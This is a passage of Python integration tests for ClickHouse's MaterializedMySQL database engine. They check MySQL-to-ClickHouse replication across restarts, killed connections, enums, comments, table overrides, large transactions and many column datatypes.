clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
clickhouse_node.query("CREATE DATABASE test_database_auto ENGINE = MaterializedMySQL('{}:3306', 'test_database_auto', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT * FROM test_database.test_table FORMAT TSV", '1\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table FORMAT TSV", '11\n')
# When ClickHouse dump all history data we can query it on ClickHouse
# but it don't mean that the sync thread is already to connect to MySQL.
# So After ClickHouse can query data, insert some rows to MySQL. Use this to re-check sync successed.
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (22)")
mysql_node.query("INSERT INTO test_database.test_table VALUES (2)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n')
get_sync_id_query = "SELECT id FROM information_schema.processlist WHERE state LIKE '% has sent all binlog to % waiting for more updates%';"
result = mysql_node.query_and_get_data(get_sync_id_query)
assert len(result) > 0
for row in result:
query = "kill " + str(row[0]) + ";"
mysql_node.query(query)
with pytest.raises(QueryRuntimeException, match="Cannot read all data"):
# https://dev.mysql.com/doc/refman/5.7/en/kill.html
# When you use KILL, a thread-specific kill flag is set for the thread.
# In most cases, it might take some time for the thread to die because the kill flag is checked only at specific intervals.
for sleep_time in [1, 3, 5]:
time.sleep(sleep_time)
clickhouse_node.query("SELECT * FROM test_database.test_table")
clickhouse_node.query_with_retry("DETACH DATABASE test_database")
clickhouse_node.query("ATTACH DATABASE test_database")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n')
mysql_node.query("INSERT INTO test_database.test_table VALUES (3)")
check_query(clickhouse_node, "SELECT * FROM test_database.test_table ORDER BY id FORMAT TSV", '1\n2\n3\n')
mysql_node.query("INSERT INTO test_database_auto.test_table VALUES (33)")
check_query(clickhouse_node, "SELECT * FROM test_database_auto.test_table ORDER BY id FORMAT TSV", '11\n22\n33\n')
clickhouse_node.query("DROP DATABASE test_database")
clickhouse_node.query("DROP DATABASE test_database_auto")
mysql_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database_auto")
def mysql_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE IF EXISTS kill_mysql_while_insert")
mysql_node.query("CREATE DATABASE kill_mysql_while_insert")
mysql_node.query("CREATE TABLE kill_mysql_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_mysql_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_mysql_while_insert', 'root', 'clickhouse') SETTINGS max_wait_time_when_mysql_unavailable=-1".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_mysql_while_insert FORMAT TSV", 'test\n')
try:
def insert(num):
for i in range(num):
query = "INSERT INTO kill_mysql_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(10000,))
t.start()
clickhouse_node.cluster.restart_service(service_name)
finally:
with pytest.raises(QueryRuntimeException) as exception:
time.sleep(2)
clickhouse_node.query("SELECT count() FROM kill_mysql_while_insert.test")
mysql_node.alloc_connection()
clickhouse_node.query_with_retry("DETACH DATABASE kill_mysql_while_insert")
clickhouse_node.query("ATTACH DATABASE kill_mysql_while_insert")
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_mysql_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_mysql_while_insert.test", res)
mysql_node.query("DROP DATABASE kill_mysql_while_insert")
clickhouse_node.query("DROP DATABASE kill_mysql_while_insert")
def clickhouse_killed_while_insert(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS kill_clickhouse_while_insert")
mysql_node.query("CREATE DATABASE kill_clickhouse_while_insert")
mysql_node.query("CREATE TABLE kill_clickhouse_while_insert.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
clickhouse_node.query("CREATE DATABASE kill_clickhouse_while_insert ENGINE = MaterializedMySQL('{}:3306', 'kill_clickhouse_while_insert', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM kill_clickhouse_while_insert FORMAT TSV", 'test\n')
def insert(num):
for i in range(num):
query = "INSERT INTO kill_clickhouse_while_insert.test VALUES({v});".format( v = i + 1 )
mysql_node.query(query)
t = threading.Thread(target=insert, args=(1000,))
t.start()
# TODO: add clickhouse_node.restart_clickhouse(20, kill=False) test
clickhouse_node.restart_clickhouse(20, kill=True)
t.join()
result = mysql_node.query_and_get_data("SELECT COUNT(1) FROM kill_clickhouse_while_insert.test")
for row in result:
res = str(row[0]) + '\n'
check_query(clickhouse_node, "SELECT count() FROM kill_clickhouse_while_insert.test FORMAT TSV", res)
mysql_node.query("DROP DATABASE kill_clickhouse_while_insert")
clickhouse_node.query("DROP DATABASE kill_clickhouse_while_insert")
def utf8mb4_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
clickhouse_node.query("DROP DATABASE IF EXISTS utf8mb4_test")
mysql_node.query("CREATE DATABASE utf8mb4_test")
mysql_node.query("CREATE TABLE utf8mb4_test.test (id INT(11) NOT NULL PRIMARY KEY, name VARCHAR(255)) ENGINE=InnoDB DEFAULT CHARACTER SET utf8mb4")
mysql_node.query("INSERT INTO utf8mb4_test.test VALUES(1, '🦄'),(2, '\u2601')")
clickhouse_node.query("CREATE DATABASE utf8mb4_test ENGINE = MaterializedMySQL('{}:3306', 'utf8mb4_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM utf8mb4_test FORMAT TSV", "test\n")
check_query(clickhouse_node, "SELECT id, name FROM utf8mb4_test.test ORDER BY id", "1\t\U0001F984\n2\t\u2601\n")
def system_parts_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_parts_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_parts_test")
mysql_node.query("CREATE DATABASE system_parts_test")
mysql_node.query("CREATE TABLE system_parts_test.test ( `id` int(11) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB;")
mysql_node.query("INSERT INTO system_parts_test.test VALUES(1),(2),(3)")
def check_active_parts(num):
check_query(clickhouse_node, "SELECT count() FROM system.parts WHERE database = 'system_parts_test' AND table = 'test' AND active = 1", "{}\n".format(num))
clickhouse_node.query("CREATE DATABASE system_parts_test ENGINE = MaterializedMySQL('{}:3306', 'system_parts_test', 'root', 'clickhouse')".format(service_name))
check_active_parts(1)
mysql_node.query("INSERT INTO system_parts_test.test VALUES(4),(5),(6)")
check_active_parts(2)
clickhouse_node.query("OPTIMIZE TABLE system_parts_test.test")
check_active_parts(1)
def multi_table_update_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS multi_table_update")
clickhouse_node.query("DROP DATABASE IF EXISTS multi_table_update")
mysql_node.query("CREATE DATABASE multi_table_update")
mysql_node.query("CREATE TABLE multi_table_update.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("CREATE TABLE multi_table_update.b (id INT(11) NOT NULL PRIMARY KEY, othervalue VARCHAR(255))")
mysql_node.query("INSERT INTO multi_table_update.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO multi_table_update.b VALUES(1, 'bar')")
clickhouse_node.query("CREATE DATABASE multi_table_update ENGINE = MaterializedMySQL('{}:3306', 'multi_table_update', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SHOW TABLES FROM multi_table_update", "a\nb\n")
mysql_node.query("UPDATE multi_table_update.a, multi_table_update.b SET value='baz', othervalue='quux' where a.id=b.id")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.a", "1\tbaz\n")
check_query(clickhouse_node, "SELECT * FROM multi_table_update.b", "1\tquux\n")
def system_tables_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS system_tables_test")
clickhouse_node.query("DROP DATABASE IF EXISTS system_tables_test")
mysql_node.query("CREATE DATABASE system_tables_test")
mysql_node.query("CREATE TABLE system_tables_test.test (id int NOT NULL PRIMARY KEY) ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE system_tables_test ENGINE = MaterializedMySQL('{}:3306', 'system_tables_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT partition_key, sorting_key, primary_key FROM system.tables WHERE database = 'system_tables_test' AND name = 'test'", "intDiv(id, 4294967)\tid\tid\n")
def materialize_with_column_comments_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_column_comments_test")
mysql_node.query("CREATE DATABASE materialize_with_column_comments_test")
mysql_node.query("CREATE TABLE materialize_with_column_comments_test.test (id int NOT NULL PRIMARY KEY, value VARCHAR(255) COMMENT 'test comment') ENGINE=InnoDB")
clickhouse_node.query("CREATE DATABASE materialize_with_column_comments_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_column_comments_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\ttest comment\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test MODIFY value VARCHAR(255) COMMENT 'comment test'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE materialize_with_column_comments_test.test ADD value2 int COMMENT 'test comment 2'")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_column_comments_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(String)\t\t\tcomment test\t\t\nvalue2\tNullable(Int32)\t\t\ttest comment 2\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_column_comments_test")
mysql_node.query("DROP DATABASE materialize_with_column_comments_test")
def materialize_with_enum8_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum8_test")
mysql_node.query("CREATE DATABASE materialize_with_enum8_test")
enum8_values_count = 127
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum8_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum8_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum8_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum8_test.test (id, value) VALUES (3, '127')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum8_test.test ORDER BY id", "1\n2\n127\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum8_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum8_test")
mysql_node.query("DROP DATABASE materialize_with_enum8_test")
def materialize_with_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS materialize_with_enum16_test")
mysql_node.query("CREATE DATABASE materialize_with_enum16_test")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("CREATE TABLE materialize_with_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum16_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE materialize_with_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'materialize_with_enum16_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n")
mysql_node.query("INSERT INTO materialize_with_enum16_test.test (id, value) VALUES (3, '500')")
check_query(clickhouse_node, "SELECT value FROM materialize_with_enum16_test.test ORDER BY id", "1\n2\n500\n")
check_query(clickhouse_node, "DESCRIBE TABLE materialize_with_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
clickhouse_node.query("DROP DATABASE materialize_with_enum16_test")
mysql_node.query("DROP DATABASE materialize_with_enum16_test")
def alter_enum8_to_enum16_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
clickhouse_node.query("DROP DATABASE IF EXISTS alter_enum8_to_enum16_test")
mysql_node.query("CREATE DATABASE alter_enum8_to_enum16_test")
enum8_values_count = 100
enum8_values = ""
enum8_values_with_backslash = ""
for i in range(1, enum8_values_count):
enum8_values += '\'' + str(i) + "\', "
enum8_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum8_values += '\'' + str(enum8_values_count) + '\''
enum8_values_with_backslash += "\\\'" + str(enum8_values_count) +"\\\' = " + str(enum8_values_count)
mysql_node.query("CREATE TABLE alter_enum8_to_enum16_test.test (id int NOT NULL PRIMARY KEY, value ENUM(" + enum8_values + ")) ENGINE=InnoDB")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (1, '1'),(2, '2')")
clickhouse_node.query("CREATE DATABASE alter_enum8_to_enum16_test ENGINE = MaterializedMySQL('{}:3306', 'alter_enum8_to_enum16_test', 'root', 'clickhouse')".format(service_name))
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (3, '75')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum8(" + enum8_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
enum16_values_count = 600
enum16_values = ""
enum16_values_with_backslash = ""
for i in range(1, enum16_values_count):
enum16_values += '\'' + str(i) + "\', "
enum16_values_with_backslash += "\\\'" + str(i) +"\\\' = " + str(i) + ", "
enum16_values += '\'' + str(enum16_values_count) + '\''
enum16_values_with_backslash += "\\\'" + str(enum16_values_count) +"\\\' = " + str(enum16_values_count)
mysql_node.query("ALTER TABLE alter_enum8_to_enum16_test.test MODIFY COLUMN value ENUM(" + enum16_values + ")")
check_query(clickhouse_node, "DESCRIBE TABLE alter_enum8_to_enum16_test.test", "id\tInt32\t\t\t\t\t\nvalue\tNullable(Enum16(" + enum16_values_with_backslash + "))\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO alter_enum8_to_enum16_test.test (id, value) VALUES (4, '500')")
check_query(clickhouse_node, "SELECT value FROM alter_enum8_to_enum16_test.test ORDER BY id", "1\n2\n75\n500\n")
clickhouse_node.query("DROP DATABASE alter_enum8_to_enum16_test")
mysql_node.query("DROP DATABASE alter_enum8_to_enum16_test")
def move_to_prewhere_and_column_filtering(clickhouse_node, mysql_node, service_name):
clickhouse_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("DROP DATABASE IF EXISTS cond_on_key_col")
mysql_node.query("CREATE DATABASE cond_on_key_col")
clickhouse_node.query("CREATE DATABASE cond_on_key_col ENGINE = MaterializedMySQL('{}:3306', 'cond_on_key_col', 'root', 'clickhouse')".format(service_name))
mysql_node.query("create table cond_on_key_col.products (id int primary key, product_id int not null, catalog_id int not null, brand_id int not null, name text)")
mysql_node.query("insert into cond_on_key_col.products (id, name, catalog_id, brand_id, product_id) values (915, 'ertyui', 5287, 15837, 0), (990, 'wer', 1053, 24390, 1), (781, 'qwerty', 1041, 1176, 2);")
mysql_node.query("create table cond_on_key_col.test (id int(11) NOT NULL AUTO_INCREMENT, a int(11) DEFAULT NULL, b int(11) DEFAULT NULL, PRIMARY KEY (id)) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;")
mysql_node.query("insert into cond_on_key_col.test values (42, 123, 1);")
mysql_node.query("CREATE TABLE cond_on_key_col.balance_change_record (id bigint(20) NOT NULL AUTO_INCREMENT, type tinyint(4) DEFAULT NULL, value decimal(10,4) DEFAULT NULL, time timestamp NULL DEFAULT NULL, "
"initiative_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, passivity_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"person_id varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, tenant_code varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin DEFAULT NULL, "
"created_time timestamp NULL DEFAULT CURRENT_TIMESTAMP COMMENT '创建时间', updated_time timestamp NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, "
"value_snapshot decimal(10,4) DEFAULT NULL, PRIMARY KEY (id), KEY balance_change_record_initiative_id (person_id) USING BTREE, "
"KEY type (type) USING BTREE, KEY balance_change_record_type (time) USING BTREE, KEY initiative_id (initiative_id) USING BTREE, "
"KEY balance_change_record_tenant_code (passivity_id) USING BTREE, KEY tenant_code (tenant_code) USING BTREE) ENGINE=InnoDB AUTO_INCREMENT=1691049 DEFAULT CHARSET=utf8")
mysql_node.query("insert into cond_on_key_col.balance_change_record values (123, 1, 3.14, null, 'qwe', 'asd', 'zxc', 'rty', null, null, 2.7);")
mysql_node.query("CREATE TABLE cond_on_key_col.test1 (id int(11) NOT NULL AUTO_INCREMENT, c1 varchar(32) NOT NULL, c2 varchar(32), PRIMARY KEY (id)) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4")
mysql_node.query("insert into cond_on_key_col.test1(c1,c2) values ('a','b'), ('c', null);")
check_query(clickhouse_node, "SELECT DISTINCT P.id, P.name, P.catalog_id FROM cond_on_key_col.products P WHERE P.name ILIKE '%e%' and P.catalog_id=5287", '915\tertyui\t5287\n')
check_query(clickhouse_node, "select count(a) from cond_on_key_col.test where b = 1;", "1\n")
check_query(clickhouse_node, "select id from cond_on_key_col.balance_change_record where type=1;", "123\n")
check_query(clickhouse_node, "select count(c1) from cond_on_key_col.test1 where c2='b';", "1\n")
clickhouse_node.query("DROP DATABASE cond_on_key_col")
mysql_node.query("DROP DATABASE cond_on_key_col")
def mysql_settings_test(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database")
mysql_node.query("CREATE TABLE test_database.a (id INT(11) NOT NULL PRIMARY KEY, value VARCHAR(255))")
mysql_node.query("INSERT INTO test_database.a VALUES(1, 'foo')")
mysql_node.query("INSERT INTO test_database.a VALUES(2, 'bar')")
clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM test_database.a FORMAT TSV", "2\n")
assert clickhouse_node.query("SELECT COUNT(DISTINCT blockNumber()) FROM test_database.a FORMAT TSV") == "2\n"
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_large_transaction(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS largetransaction")
clickhouse_node.query("DROP DATABASE IF EXISTS largetransaction")
mysql_node.query("CREATE DATABASE largetransaction")
mysql_node.query("CREATE TABLE largetransaction.test_table ("
"`key` INT NOT NULL PRIMARY KEY AUTO_INCREMENT, "
"`value` INT NOT NULL) ENGINE = InnoDB;")
num_rows = 200000
rows_per_insert = 5000
values = ",".join(["(1)" for _ in range(rows_per_insert)])
for i in range(num_rows//rows_per_insert):
mysql_node.query(f"INSERT INTO largetransaction.test_table (`value`) VALUES {values};")
clickhouse_node.query("CREATE DATABASE largetransaction ENGINE = MaterializedMySQL('{}:3306', 'largetransaction', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table", f"{num_rows}\n")
mysql_node.query("UPDATE largetransaction.test_table SET value = 2;")
# Attempt to restart clickhouse after it has started processing
# the transaction, but before it has completed it.
while int(clickhouse_node.query("SELECT COUNT() FROM largetransaction.test_table WHERE value = 2")) == 0:
time.sleep(0.2)
clickhouse_node.restart_clickhouse()
check_query(clickhouse_node, "SELECT COUNT() FROM largetransaction.test_table WHERE value = 2", f"{num_rows}\n")
clickhouse_node.query("DROP DATABASE largetransaction")
mysql_node.query("DROP DATABASE largetransaction")
def table_table(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_test")
clickhouse_node.query("DROP DATABASE IF EXISTS table_test")
mysql_node.query("CREATE DATABASE table_test")
# Test that the table name 'table' work as expected
mysql_node.query("CREATE TABLE table_test.table (id INT UNSIGNED PRIMARY KEY)")
mysql_node.query("INSERT INTO table_test.table VALUES (0),(1),(2),(3),(4)")
clickhouse_node.query("CREATE DATABASE table_test ENGINE=MaterializeMySQL('{}:3306', 'table_test', 'root', 'clickhouse')".format(service_name))
check_query(clickhouse_node, "SELECT COUNT(*) FROM table_test.table", "5\n")
mysql_node.query("DROP DATABASE table_test")
clickhouse_node.query("DROP DATABASE table_test")
def table_overrides(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("CREATE DATABASE table_overrides")
mysql_node.query("CREATE TABLE table_overrides.t1 (sensor_id INT UNSIGNED, timestamp DATETIME, temperature FLOAT, PRIMARY KEY(timestamp, sensor_id))")
for id in range(10):
mysql_node.query("BEGIN")
for day in range(100):
mysql_node.query(f"INSERT INTO table_overrides.t1 VALUES({id}, TIMESTAMP('2021-01-01') + INTERVAL {day} DAY, (RAND()*20)+20)")
mysql_node.query("COMMIT")
clickhouse_node.query(f"""
CREATE DATABASE table_overrides ENGINE=MaterializeMySQL('{service_name}:3306', 'table_overrides', 'root', 'clickhouse')
TABLE OVERRIDE t1 (COLUMNS (sensor_id UInt64, temp_f Nullable(Float32) ALIAS if(isNull(temperature), NULL, (temperature * 9 / 5) + 32)))
""")
check_query(
clickhouse_node,
"SELECT type FROM system.columns WHERE database = 'table_overrides' AND table = 't1' AND name = 'sensor_id'",
"UInt64\n")
check_query(
clickhouse_node,
"SELECT type, default_kind FROM system.columns WHERE database = 'table_overrides' AND table = 't1' AND name = 'temp_f'",
"Nullable(Float32)\tALIAS\n")
check_query(clickhouse_node, "SELECT count() FROM table_overrides.t1", "1000\n")
mysql_node.query("INSERT INTO table_overrides.t1 VALUES(1001, '2021-10-01 00:00:00', 42.0)")
check_query(clickhouse_node, "SELECT count() FROM table_overrides.t1", "1001\n")
clickhouse_node.query("DROP DATABASE IF EXISTS table_overrides")
mysql_node.query("DROP DATABASE IF EXISTS table_overrides")
def materialized_database_support_all_kinds_of_mysql_datatype(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_datatype")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_datatype")
mysql_node.query("CREATE DATABASE test_database_datatype DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("""
CREATE TABLE test_database_datatype.t1 (
`v1` int(10) unsigned AUTO_INCREMENT,
`v2` TINYINT,
`v3` SMALLINT,
`v4` BIGINT,
`v5` int,
`v6` TINYINT unsigned,
`v7` SMALLINT unsigned,
`v8` BIGINT unsigned,
`v9` FLOAT,
`v10` FLOAT unsigned,
`v11` DOUBLE,
`v12` DOUBLE unsigned,
`v13` DECIMAL(5,4),
`v14` date,
`v15` TEXT,
`v16` varchar(100) ,
`v17` BLOB,
`v18` datetime DEFAULT CURRENT_TIMESTAMP,
`v19` datetime(6) DEFAULT CURRENT_TIMESTAMP(6),
`v20` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
`v21` TIMESTAMP(6) DEFAULT CURRENT_TIMESTAMP(6),
/* todo support */
# `v22` YEAR,
# `v23` TIME,
# `v24` TIME(3),
# `v25` GEOMETRY,
`v26` bit(4),
# `v27` JSON DEFAULT NULL,
# `v28` set('a', 'c', 'f', 'd', 'e', 'b'),
`v29` mediumint(4) unsigned NOT NULL DEFAULT '0',
`v30` varbinary(255) DEFAULT NULL COMMENT 'varbinary support',
`v31` binary(200) DEFAULT NULL,
`v32` ENUM('RED','GREEN','BLUE'),
PRIMARY KEY (`v1`)
) ENGINE=InnoDB;
""")
mysql_node.query("""
INSERT INTO test_database_datatype.t1 (v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v31, v32) values
(1, 11, 9223372036854775807, -1, 1, 11, 18446744073709551615, -1.1, 1.1, -1.111, 1.111, 1.1111, '2021-10-06', 'text', 'varchar', 'BLOB', '2021-10-06 18:32:57', '2021-10-06 18:32:57.482786', '2021-10-06 18:32:57', '2021-10-06 18:32:57.482786', b'1010', 11, 'varbinary', 'binary', 'RED');
""")
clickhouse_node.query(
"CREATE DATABASE test_database_datatype ENGINE = MaterializeMySQL('{}:3306', 'test_database_datatype', 'root', 'clickhouse')".format(
service_name))
check_query(clickhouse_node, "SELECT name FROM system.tables WHERE database = 'test_database_datatype'", "t1\n")
# full synchronization check
check_query(clickhouse_node, "SELECT v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v32 FROM test_database_datatype.t1 FORMAT TSV",
"1\t1\t11\t9223372036854775807\t-1\t1\t11\t18446744073709551615\t-1.1\t1.1\t-1.111\t1.111\t1.1111\t2021-10-06\ttext\tvarchar\tBLOB\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t10\t11\tvarbinary\tRED\n")
mysql_node.query("""
INSERT INTO test_database_datatype.t1 (v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v31, v32) values
(2, 22, 9223372036854775807, -2, 2, 22, 18446744073709551615, -2.2, 2.2, -2.22, 2.222, 2.2222, '2021-10-07', 'text', 'varchar', 'BLOB', '2021-10-07 18:32:57', '2021-10-07 18:32:57.482786', '2021-10-07 18:32:57', '2021-10-07 18:32:57.482786', b'1011', 22, 'varbinary', 'binary', 'GREEN' );
""")
# increment synchronization check
check_query(clickhouse_node, "SELECT v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v26, v29, v30, v32 FROM test_database_datatype.t1 ORDER BY v1 FORMAT TSV",
"1\t1\t11\t9223372036854775807\t-1\t1\t11\t18446744073709551615\t-1.1\t1.1\t-1.111\t1.111\t1.1111\t2021-10-06\ttext\tvarchar\tBLOB\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t2021-10-06 18:32:57\t2021-10-06 18:32:57.482786\t10\t11\tvarbinary\tRED\n" +
"2\t2\t22\t9223372036854775807\t-2\t2\t22\t18446744073709551615\t-2.2\t2.2\t-2.22\t2.222\t2.2222\t2021-10-07\ttext\tvarchar\tBLOB\t2021-10-07 18:32:57\t2021-10-07 18:32:57.482786\t2021-10-07 18:32:57\t2021-10-07 18:32:57.482786\t11\t22\tvarbinary\tGREEN\n")
|
checker.py
|
